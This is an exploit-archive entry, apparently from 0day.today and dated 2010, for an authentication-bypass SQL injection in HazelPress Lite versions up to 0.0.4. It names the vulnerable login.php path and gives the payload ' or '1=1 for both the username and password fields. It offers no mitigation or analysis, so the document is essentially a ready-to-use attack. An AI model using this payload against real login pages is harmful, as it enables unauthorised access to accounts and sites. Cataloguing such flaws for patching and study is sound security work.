id: 11128
date: 02/28/2010
title: HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
author: cr4wl3r
cves: 

==================================================================
HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
==================================================================

# HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://hazelpress.org/index.php?hazel=downloads
 
# PoC: [path]/login.php
 
# Username: ' or '1=1
# password: ' or '1=1



#  0day.today [2023-03-27]  #